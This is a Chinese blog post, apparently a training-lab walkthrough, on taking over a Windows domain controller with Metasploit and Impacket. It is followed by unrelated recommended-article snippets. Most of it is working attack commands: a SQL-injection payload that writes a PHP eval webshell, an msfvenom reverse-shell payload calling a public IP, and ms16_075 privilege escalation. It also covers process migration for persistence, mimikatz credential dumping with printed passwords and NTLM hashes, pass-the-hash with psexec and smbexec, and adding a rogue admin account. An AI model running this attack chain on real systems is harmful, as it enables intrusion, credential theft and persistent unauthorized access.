msf如何内网信息收集,内网信息收集工具

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看资料】

1、进去一看,典型的sql注入

 

2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

 

②蚁剑连接,发现权限很低

msf如何内网信息收集,内网信息收集工具

 

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么**,方法太多了)

kali**用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108

 

2、接着设置一下花生壳的配置

 

3、可以看到我们映射到公网的ip和端口

 

4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

msf如何内网信息收集,内网信息收集工具

 

4、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp

或者使用

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 6666

run

 

5、执行webshell中的木马

msf如何内网信息收集,内网信息收集工具

 

sessions 1 //进入会话

6、发现无法不是最高权限,getsystem/getprivs并未成功

msf如何内网信息收集,内网信息收集工具

 

7、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令

msf如何内网信息收集,内网信息收集工具

 

②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

msf如何内网信息收集,内网信息收集工具

 

③接着监听的那个msf窗口1就获得了一个system权限的会话

msf如何内网信息收集,内网信息收集工具

 

看路由器命令

route

msf如何内网信息收集,内网信息收集工具

 

一般为了防止后门被人关掉,将其注入到其他程序中

ps 查看进程pid

msf如何内网信息收集,内网信息收集工具

 

接着用migrate将我们后门注入到1816中,有效防止木马挂了

migrate 1816

msf如何内网信息收集,内网信息收集工具

 

通过shell命令进入命令窗口

msf如何内网信息收集,内网信息收集工具

 

内网信息收集

可以通过ifconfig看到内网ip

msf如何内网信息收集,内网信息收集工具

 

接着利用后渗透工具ping方法扫一下ip段,接着扫出三个ip存活

info post/multi/gather/ping_sweep //查看所需参数

run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //扫网段

msf如何内网信息收集,内网信息收集工具

 

还有一种方法,arp扫ip段,用法差不多,这个扫得快一些比较推荐

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

msf如何内网信息收集,内网信息收集工具

 

这是利用msf自带工具扫描,接下来再演示使用nmap扫一下看看

首先添加一个路由如下命令

run get_local_subnets //查看网段

run autoroute -s 10.0.1.0/24

run autoroute -p //查看已添加的路由

background //保存session返回msf

msf如何内网信息收集,内网信息收集工具

 

接着开启socks4a服务,使用msf的辅助模块

use auxiliary/server/socks_proxy

set VERSION 4a //设置为socks4a

run

msf如何内网信息收集,内网信息收集工具

 

接着设置/etc/proxychains.conf 中的内容改为下面展示截图,kali自带的代理工具

vim /etc/proxychains.conf

msf如何内网信息收集,内网信息收集工具

 

接着我们就可以利用proxychains4来进行连接3389端口,和进行内网ip段扫描,使用nmap扫描其内网ip及其端口等,但是扫的真的慢是我网太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

msf如何内网信息收集,内网信息收集工具

 

看到好多445端口,这里其实可以用永恒之蓝的

当然,也可以选择不用nmap扫描端口,我们可以用msf的模块扫描端口

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.1.6

msf如何内网信息收集,内网信息收集工具

 

kali机用kiwi抓取密码

也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

msf如何内网信息收集,内网信息收集工具

 

其实kiwi就是mimikatz就是换了个名在这里,然后加载kiwi

msf如何内网信息收集,内网信息收集工具

 

查看当前kiwi的命令用help

help

msf如何内网信息收集,内网信息收集工具

 

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonpasswords

msf如何内网信息收集,内网信息收集工具

 

获得密码

u:administrator

p:woshifengge1.

kali机hash传递得到会话

看到445端口就可以尝试hash传递,在不需要密码的情况下使用,发现10.0.1.6-10.0.1.8可以被利用

hashdump可获取hash值,得是64位系统权限才可执行

hashdump 

或者是 

run post/windows/gather/hashdump

或者是

run  post/windows/gather/smart_hashdump

以上都可以获取hash值



background 返回

msf如何内网信息收集,内网信息收集工具

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通过网段知道6-8有445可以利用smb的hash传递连接10.0.1.8这台机子,因为一般情况几台机子的密码都相同。

use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp 

//正向连接

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83  #hashdump获取的hash值进行

msf如何内网信息收集,内网信息收集工具

 

msf如何内网信息收集,内网信息收集工具

 

这里发现10.0.1.8这台机子存在域控,dns一般是和域控绑定在一个服务器上的

shell

ipconfig /all

msf如何内网信息收集,内网信息收集工具

 

shell查看域的命令

shell中命令使用查看是否存在域的方法

这里明显A1这台机子处于域中

1、查看域中计算机

net view //查看域中的计算机

msf如何内网信息收集,内网信息收集工具

 

net view /domain //查看域

msf如何内网信息收集,内网信息收集工具

 

根据ipconfig /all 可以知道域控主机的ip是10.0.1.6

hash传递并不能登陆进去

2、查看域中的计算机

就一台A1,这里我们得通过A1去获得域控

net view /domain:ZKAQ

msf如何内网信息收集,内网信息收集工具

 

3、ping计算机名可以得到IP

ping A1

msf如何内网信息收集,内网信息收集工具

 

ping zkaq.cn

msf如何内网信息收集,内网信息收集工具

 

4、获得所有域的用户列表,有一个krbtgt就是域用户

net user /domain

msf如何内网信息收集,内网信息收集工具

 

5、获取域用户组信息

net group /domain

msf如何内网信息收集,内网信息收集工具

 

6、获取当前域管理员信息

net group "domain admins" /domain

msf如何内网信息收集,内网信息收集工具

 

7、查看域时间及域服务器的名字

net time /domain

msf如何内网信息收集,内网信息收集工具

 

通过域的信息收集得到DC.zkaq.cn 10.0.1.6这个就是域控

拓展,导入kiwi的命令使用

msf如何内网信息收集,内网信息收集工具

 

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

msf如何内网信息收集,内网信息收集工具

 

2、kerberos抓密码,发现全部加密了

kiwi_cmd sekurlsa::kerberos

msf如何内网信息收集,内网信息收集工具

 

3、也可以用creds_all抓取密码,但也明显加密

creds_all

msf如何内网信息收集,内网信息收集工具

 

Username       Domain  NTLM

--------       ------  ----

A1$            ZKAQ    3bf63ae494aee3a74fa90a41b9459df9

Administrator  ZKAQ    61465a991b168727b65b3644aab823cd 

Administrator  A1      4d1de63584701c85b8b9eccf5243ef83

Impacket实现域控NTML的hash传递

这里发现密码是无法获取的,因为NTLM是密文,我们可以使用hash传递,不过这里得使用Impacket的包

首先我们要先去GitHub下载源码,或者直接使用

git clone 

然后解压缩,进入impacket

cd impacket/

然后运行

python setup.py install

工具都在这个目录里impacket/examples

cd impacket/examples

msf如何内网信息收集,内网信息收集工具

 

接着我们使用smbexec.py这个模块,用上面的ntml值hash传递登陆域控机子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超级管理员权限

msf如何内网信息收集,内网信息收集工具

 

接下来是基础操作添加超管账号,然后登陆域控

net user gylq ********** /add #密码打长的,2008有限制,密码不能太简单

net localgroup administrators gylq /add #添加超管

msf如何内网信息收集,内网信息收集工具

 

直接代理登陆域控10.0.1.6就报错,这是域控机的守护机制

msf如何内网信息收集,内网信息收集工具

 

需要使用他域内的机子去登陆,我们先登陆10.0.1.8,再登陆域控

远程3389登陆域控

也可以用直接用抓取的密码来代理登陆3389的端口等,只是演示一下

如果对方没有开启远程连接,可以使用msf自带命令启动

run getgui -e

先登陆10.0.1.4,才发现这个不是域内机子,得去登陆10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

msf如何内网信息收集,内网信息收集工具

 

也可以用代理直接连接10.0.1.8,来进行确定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

接着用10.0.1.8作为跳板登陆10.0.1.6,即域控机子

msf如何内网信息收集,内网信息收集工具

 

成功登陆域控

msf如何内网信息收集,内网信息收集工具

 

总结:这是kali中使用msf和impacket联合拿域控

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/326457.html

(0)

相关推荐

  • 影帝们的公寓沈彻表白(影帝们的公寓讲的是什么)

    HELLO,小伙伴们好呀!小烩今天继续为大家带来由纯爱小说改编的漫画《影帝们的公寓》。上次我们说到,沈彻被秦修撞伤,路人怕秦修跑路,纷纷要他负起责任。下面一起来看后面的剧情吧。 沈彻医院醒来,带伤去酒店试镜   沈彻被秦修送到了医院。沈彻醒来的时候秦修已经不在了。照顾沈彻的两位护士小姐姐,似乎误会了他俩的关系,小烩嗅到了一丝两位护士小姐姐是同类的味…

    2022-01-05 投稿
  • 臻浓牛奶与纯奶区别(蒙牛臻浓牛奶与纯奶有什么不一样)

    不管是要加强营养的青春期、孕哺乳期,还是注重健康的中老年阶段,牛奶都是人们强化营养的好选择。这是因为,牛奶有三大好处:优质蛋白质的提供者;B族维生素、锌、硒的提供者;钙的提供者,每天一杯奶更有助于人体的健康。洞悉国民健康需求的伊利牛奶创新推出了“臻浓牛奶高钙+”的新品,为消费者带来更高效的营养补充。 按照我国营养标签标准,只有钙含量达到120mg/100ml…

    2022-05-09
  • 马云的励志故事简短100字,名人励志故事简短100字

    马云在2013年5月10号,在杭州的淘宝十周年庆典上表示,这是一个变化的时代。还有人没搞清楚PC,移动互联网来了;还没搞清楚移动互联网,大数据来了。而变化的时代是年轻人的时代。 “不是变化的时代,年轻人,轮不到你们,”马云鼓励现场的3万多合作伙伴和阿里年轻人,“十年以前,看到无数伟大的公司,我们也曾迷茫,我们还会有机会吗?坚持、执着、面对变化,我们走到了今天…

    2023-02-11
  • 非洲小朋友举牌(非洲小朋友举牌视频怎么来的)

    “非洲小朋友举牌视频”内容多为广告。 最近,国内一些主流的互联网公司都被非洲小孩祝福了。确切地说,他们都蹭了国内“非洲小朋友举牌”刷屏的热度。现在若是在淘宝上搜索,大家能够看到很多价格不一的服务。 若干个非洲小孩凑在一起,围着一个黑板,用不是特别流利的中文喊着广告词,就这么简单粗暴!成本不过百元,大家乐此不疲地制作和转发,简陋的产品达成了现象级的传播。 按照…

    2022-01-23
  • 批发什么挣钱(在临沂批发什么最挣钱)

    卖不出的服装都去哪儿了? 你有没有想过,商场里那些卖不出的服装,都到哪里去了? 事实上,库存一直都是服装行业的“阿喀琉斯之踵”。 一方面,服装由于更新频率高,季节性强的问题,造成库存的先天性不足。另一方面,服装的工艺难度高,生产周期长,造成计划赶不上变化,无法及时适应市场需求,导致库存积压。 而服装的长时间积压,不仅带来了库房和门店的租金压力,还可能会拖垮现…

    2023-06-04 投稿
  • 网络兼职挣钱(如何网上兼职赚钱)

    打着“真人社交”旗号的恋爱交友APP,和你聊天的却是平台雇来的“陪聊员”?日前,曾兼职过陪聊员的张杨(化名,男)向南都报料称,一款名为“蜜月交友”的APP通过招募陪聊员“当托”,诱导男性充值、送礼从中牟利,陪聊员一晚可分成上千元。 记者进一步调查发现,许多真人交友APP均有招募陪聊员,通过陪聊诱导用户充值消费或已成行业潜规则。记者在网上找到不少兼职陪聊员招募…

    2022-01-27
  • 逾期多久会成老赖(逾期多少次会被认定为老赖)

    刷信用卡,满足了你一时的消费欲望。但当还款日期临近,你的心里一定很慌,工资到手就没,甚至不得不继续刷信用卡,才能维持生活,从此陷入恶性循环。特别是90后人群,买衣服下馆子,信用卡,刷!出国旅游,信用卡,刷!网上购物,花呗,借呗!打白条。然而很多卡奴为了偿还信用卡拆东墙补西墙,让很多网贷有机可乘,从而走上不归路。在这里奉劝大家如果你正在补墙千万别碰高利贷和小额…

    2021-12-20 投稿
  • 现在卖性保健品挣钱吗(卖保健品利润怎么样)

    舌尖上的行业,刀尖上的企业。” 保健品行业总是伴随着各种争议。从神乎其神的功效,到与传销一线之隔的销售模式,有很多人相信,也有很多人称之为“智商税”。 让小孩变聪明,让女人变美,让孕妇安胎,让男人更行,让老人长寿……各种各样的产品层出不穷,企业不惜重金砸向营销,大肆宣传之下,总能找到各自的“信徒”。 三株口服液、太阳神口服液、养生堂龟鳖丸、脑白金、生命一号……

    2021-11-16 投稿
  • 宝妈开眼镜店必看(如何开好一个眼镜店)

    近年来随着眼镜需求量的增加,越来越多的人开始投身眼镜行业,想开一家眼镜店,但是眼镜店还是和传统零售店有一定区别的,眼镜店是一个半医半商的行业,其独特性和专业性,今天锐森眼镜的小编就来为大家详细介绍一下,开眼镜店所需要的几个资质和条件。   1、充足的资金 不管是加盟眼镜店还是自己开眼镜店,不管是大店还是小店,开眼镜店都需要一笔不小的资金来支持,开眼…

    2022-01-06
  • 世界最大的沙漠?撒哈拉沙漠属于哪个国家

    沙漠通常被认为是炎热、干旱的地区,有大片的沙子和干燥的土壤。虽然某些地区确实如此,但并非所有地区都符合这一描述。决定哪些地区是沙漠的是降水,而不是沙子和热量。世界各大洲都有沙漠,但这些沙漠的性质和大小差别很大。由于沙漠与艰苦的生活条件有关,它们通常是世界上人口最稀少的地区。下面让我们看一看世界上最大的10个沙漠。 1 南极沙漠- 1420万平方公里 叙利亚沙…

    2023-01-29
  • 写文章怎么赚钱?2022写文章赚钱方法

    看文章的你是否相信写作能赚钱呢? 写作可以赚到钱,不过写作赚钱靠的不是文采,是效率。 相信今天分享的内容会颠覆很多人的认知,我的一个小伙伴,1小时可以写1万字,出10篇水文,靠这技巧在老家买了一套房。 下面带来两个快速写作的方法,记得看完后用你发财的小手帮我们点个赞哦,学会了写作就像呼吸一样简单。   01 语音写作法   人的思维是跳跃…

    2022-04-30 投稿
  • 难以为继和举步维艰的区别(难以为继一般形容什么)

    在本文中,作者给大家带来的是20年国考行测言语中逻辑填空部分的词语积累。 举步维艰:迈步艰难。指事情难办,每前进一步都非常艰难。 日薄西山:薄,迫近。太阳快要落山。比喻事物接近衰亡或人已衰老,临近死亡。 难以为继:难以继续下去。 岌岌可危:岌岌,很危险的样子。形容极其危险,快要倾覆或灭亡。 望而却步:却,后退。一望见,就向后退。形容遇到困难就向后退缩。 无可…

    投稿 2023-02-13